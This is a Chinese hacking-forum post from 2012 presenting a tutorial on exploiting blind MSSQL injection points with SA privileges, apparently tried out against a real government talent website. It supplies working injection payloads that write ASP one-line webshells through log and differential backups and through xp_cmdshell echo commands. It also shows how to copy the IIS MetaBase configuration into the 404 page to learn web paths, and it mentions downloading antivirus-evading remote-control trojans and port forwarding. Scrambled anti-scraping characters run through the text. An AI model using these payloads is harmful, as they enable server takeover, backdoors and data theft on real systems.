找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2182|回复: 0
打印 上一主题 下一主题

sa权限的教程.

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:30:15 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
————————————————————————九零后安全技术小组 | 90 Security  Team -- 打造90后网安精英团队  ———————————————————————————————
' O3 \0 @: n$ r1 k( Y& k* Q6 X  J. T9 i; q
2 }, z0 N; t. I2 r
                                                             欢迎高手访问指导,欢迎新手朋友交流学习。
, z! T' C0 _4 e, V/ U' k5 Z. L/ \& v& n8 t
                                                                 
! X0 q! {) J8 C+ \                                                                 1 z4 M- p0 i: N" `8 O" \1 A# r
                                                                  论坛: http://www.90team.net/
( c6 _2 c' v& X$ @
% U2 `5 Z/ d" [' q1 @* d$ M9 [5 ~
$ y! H6 y2 y7 R2 k% V' n$ `  y- z) ?. m- |& V" ?
友情检测国家人才网6 D2 p! C" f! g8 x8 e

$ K  s3 O$ G1 p+ i4 s% }5 M% w7 X8 O# _" j. M! h$ G
内容:MSSQL注入SA权限不显错模式下的入侵8 P( U4 q% }( l2 }4 Q. v
& H. k& D% X) P2 Z
! a3 p: g. F& F* w, w8 H  m1 ?0 D
一般新手扫到不显错的SA(systemadmin)的注入点时,虽然工具能猜表列目录但还是很麻烦有的人就直接放弃了,今天我给大家演示下如何利用。方法很简单大家看操作。- D  z8 h& _$ x! ~' [
- |" X! a, f2 U) B
我这里使用的是 火狐的插件提交参数。跟在浏览器里直接提交一样。0 I! [  q" I' @: H3 }# }

" q( g6 U3 G5 n7 `5 N- |& d$ `6 k) }4 k# |8 `
这里的主机环境:MSSQL+JSP 权限为不显错的SA,支持多行执行 xp_cmdshell存活 服务器处于内网,WEB和数据库在同一台服务器上。注意这里服务器操作系统是windows2003,IIS,404页面的默认路径是 C:\Windows\Help\iisHelp\common\404b.htm。( J- h3 D# f4 u
* h8 y+ n2 `2 ]2 R
思路:
+ e  V, [. }6 l/ T& B' g& Y( A/ v: d' o3 T3 R
首先:! m/ m* e+ s# q+ {; x. p6 ^
, N; j, Q! m; E/ z3 E& T
通过XP_CMDSHELL 执行命令再将执行结果指向IIS的404页面,然后访问WEB站点的一个不存在的目录得到命令执行结果,刺探服务器信息。$ C. M) E# J4 s
9 `: F% O) I$ Z- {! \! r: }
1.日志备份获得Webshell
& J1 H( H9 _& [( n. T0 x& |: H6 g: |5 S2 {) X; b7 A+ L
2.数据库差异备份获得Webshell- x& m) K1 J2 h5 W% q7 K! D' v

8 k8 X# W8 R+ u0 t! h/ J) W4.直接下载免杀远控木马。
3 r! {" K7 p. b) p3 c4 T7 d
* R& c+ m1 G: g& p# w5.直接下载LCX将服务器端口转发出来" R% z0 C8 |6 n, B1 [
( e' ?9 J" P. }; g3 ~( S1 w+ U
6.通过XP_CMDSHELL 执行命令读取iis配置文件(C:\Windows\system32\inetsrv\MetaBase.xml )分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL上传LCX将服务器转发出来。4 A; C. O$ S7 @) N& e: m/ B* }

. g' v% u* ~0 c' y! q9 a, c2 M$ E5 w1 z7 z5 p! W$ o

! L! |/ x- o2 ]+ u, f# ~在这里我就不浪费大家时间了,我已经测试过  日志备份和 数据库差异备份 都没有成功 我就不演示了。  直接下载免杀木马。。这个也不用演示了。 直接在注入点后写入一个 DOWN 的VBS脚本下载就行了, , o0 ]+ z* ]5 C0 t
2 c% i! v7 J) M; y* D
我直接演示后面一个方法
5 F% v9 a1 P( D3 a9 g* w8 L) f; K3 }7 E% ]) V" S
  @: X4 O  c: A: @7 t& Q6 O+ \5 E
分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL 4 B" X! L# E* B& D9 |$ H6 a

( U7 A& r1 ]* {7 \8 T% n. _& D+ W8 W$ U4 o

+ h' B8 Z$ v+ G1 L8 A: g5 a! N% k2 W: X
◆日志备份:  K; O' ^7 y4 [! s/ J
$ b7 Z7 G! `. o& `
: o5 ~, X; N, z3 J; I' Q
1. 进行初始备份
5 j1 a) v* w5 e' z; Alter Database TestDB Set Recovery Full Drop Table ttt Create Table ttt (a image) Backup Log TestDB to disk = '<e:\wwwroot\m.asp>' With Init--
6 e; E( X4 E) y9 b  Y) _- O. G" U& f8 e: u. f
2. 插入数据
  i9 x& e/ P5 b( L# |) N" };Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)--
) ^* h- K. F% E0 c5 L7 Y
* G6 H, ]/ W& r) f# I3 S7 }0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E   为 一句话木马 %><%eval(request(chr(97))):response.end%>
3 F4 f: X* p2 m$ Z1 K- v+ ?6 T  ; M+ k8 h# H  }8 c- p
3. 备份并获得文件,删除临时表2 G! L' ~) c3 J- K! }
;Backup Log <数据库名> To Disk = '<e:\wwwroot\m.asp>';Drop Table ttt Alter Database TestDB Set Recovery SIMPLE--' H% U: @5 y+ B* h1 m5 O

7 A& E0 [* {- p, R: t3 N* O% z& C1 @4 \: N
& _* B# F5 }4 a! f
◆数据库差异备份
/ h0 ?! f- ?! g2 g! ?8 u% K
2 H& Z% e  |2 q0 u2 A  w2 H(1. 进行差异备份准备工作* s. y6 F/ G* y" N7 I
9 G: v# w/ ?) D) U1 {
;Declare @a Sysname;Set @a=db_name();Declare @file VarChar(400);Set @file=<0x633A5C746573742E617370>;Drop Table ttt Create Table ttt(c Image) Backup Database @a To Disk=@file--, v* |7 l' l1 K
& x/ m/ _+ Z' @9 P
上面的 0x633A5C746573742E617370  是 c:\test.asp 路径转换后的16进制编码. l4 f1 f6 _' r; H) Z+ C  A
4 u* W+ w1 M4 x  @- H7 Y2 u; u

8 i  A' S# D! X( s: X$ n3 n(2. 将数据写入到数据库
, m/ p8 Q% H4 ]4 C. p% c1 _2 l;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)-- - N4 r1 a) v8 C) [6 h% N6 n
; P3 V6 B+ F/ U' M
0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E   为 一句话木马 %><%eval(request(chr(97))):response.end%>
5 z, A" ~: W1 h6 k: M3 w- v* _
3 R( }( _% L, e& V4 L$ J3 W3. 备份数据库并清理临时文件; l! O! w3 j9 j3 h; G9 b* Q) |$ i
: \% w  K( Y! l
;Declare @b SysName;Set @b=db_name();Declare @file1 VarChar(400);Set @file1=<0x633A5C746573742E617370>;Backup Database @b To Disk=@file1 With Differential,Format;Drop Table ttt;--7 t; ^' E& e3 x5 E7 h

2 _8 W& d5 Q+ ^' v0x633A5C746573742E617370  为 c:\test.asp  删除临时文件
) X1 L5 w( p, Z: L' Z, |1 _$ d6 s' ?/ C# B4 u  \

2 c+ ~4 r8 a: y- A, O  E8 g5 k' w7 D" \+ z/ O& Q
用^转义字符来写ASP(一句话木马)文件的方法:   
6 n5 v; c9 }3 K' n. q
1 x! }# s3 x. E4 S+ J1.注入点后执行;exec master.dbo.xp_cmdshell 'echo ^<script language=VBScript runat=server^>execute request^("90"^)^</script^> >c:\mu.asp';--' r; ^3 }* H3 R) M7 @+ g6 i4 h# B

, H! M: r  a# U+ M2.CMD下执行 echo ^<%execute^(request^("l"^)^)%^> >c:\mu.asp
. W0 O" L1 [1 z2 j- m) S7 O! S7 p' |+ k; ~2 l& D: X
读取IIS配置信息获取web路径+ j  L' K5 b% G4 L3 Z( q6 ~; a! g

% a# x  ^/ Q0 ^- O  B     
. e# K" h. {! r2 J" j     注入点后面执行   ;exec master..xp_cmdshell 'copy C:\Windows\system32\inetsrv\MetaBase.xml C:\Windows\Help\iisHelp\common\404b.htm'--
8 P" G$ u. {* h  G1 ^; V3 s% C) k& Z. A1 ^4 q: R
执行命令
9 w9 \- K* U% H- g/ f& o( O     
0 i5 H, g9 b& r+ [3 {3 `' `     注入点后面执行   ;exec master..xp_cmdshell 'ver >C:\Windows\Help\iisHelp\common\404b.htm'--1 d, k/ k1 s& t1 v. L* @& r" o) L

3 g5 H# e; ]# _! W1 Q) e% ]5 p3 P' R0 Q6 B; V& F5 C
) [/ C! |* P2 V2 P0 S* b- y
# `1 G- v* B$ |6 H  c/ q5 G* ]

+ A- \+ F5 E3 Z& K. d
" H" c1 B. f: U' @+ {4 T2 [0 f& J2 T! x, G0 S  t; ~( V

8 G% u2 o7 s+ O) s9 ]" o
+ y. L. L& @0 z& C$ R; y! p: E) O5 d4 j+ @
! ]/ O0 ?0 d! \% K; S
6 |# |8 J- z& K5 v) e" S' ]* O
$ u. [0 p( c/ K4 ^5 o8 b, A5 v

# M8 C2 R8 U: ^6 W7 j
  @0 n' \, N0 l" @
! y- ^9 C$ U" Q7 @. ~- l6 d9 o$ f+ S

0 C7 `3 i* h, k- y
( M  N4 j9 ]0 \. g4 c6 T4 T0 Y9 d' T: G

& M# X) _- J6 X2 m# _) I7 p* q$ [5 B  v
) B) Y9 v# A( M
. o: W/ l' s0 @% a6 x

5 H! b% t. E0 o! v- a# Y, _$ ~2 k. c. D+ m. `

- ~3 B' I  p' d3 U# g- a
+ y0 \# D' |: L& M& \& V7 G5 A2 h
7 x' K$ i' ~, s8 [2 {) ^2 C
" f) L7 c. B4 I* F+ O5 ]8 ~) K
$ Y! @  I! W( d) g2 _0 E4 K0 u; p1 g7 Q' U8 T" m$ l
4 p$ H. S8 J9 g
9 j' `1 B# ~+ Y( n1 u
( |7 M: P" Y& {6 W( C/ d7 i- z; L" G# X3 l

# j5 t6 e% l# }4 M& G: Z& [  g! Q% S
7 I$ W, }5 C! M/ [0 p+ A. P! v$ P$ q+ p

8 C, l! `3 u  X* O' w" W+ I8 D
4 {! i* H9 e7 C: ]7 ]. H$ k% a/ y: N9 r

3 C8 |2 U. t3 }) C- g4 z
4 L9 Z! i% o0 j3 @" _, e8 B, W% o- t2 M+ z+ D$ ^% D
" z' F; M/ i5 Q% n
1 a+ V0 s$ s: S
% A" V8 d* M; x+ N: e8 q3 @8 `: q. O

! z' L1 V* _$ Y  v" Z
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表